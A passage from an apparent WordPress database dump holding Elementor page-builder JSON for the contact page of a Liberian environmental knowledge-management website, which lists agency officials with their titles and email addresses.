umn\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14826,2352,'_elementor_edit_mode','builder'),(14827,2352,'_elementor_template_type','wp-page'),(14828,2352,'_elementor_version','2.7.5'),(14829,2352,'_wp_page_template','default'),(14830,2352,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong>\\nConservation Manager, FDA\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14832,2353,'_elementor_edit_mode','builder'),(14833,2353,'_elementor_template_type','wp-page'),(14834,2353,'_elementor_version','2.7.5'),(14835,2353,'_wp_page_template','default'),(14836,2353,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact 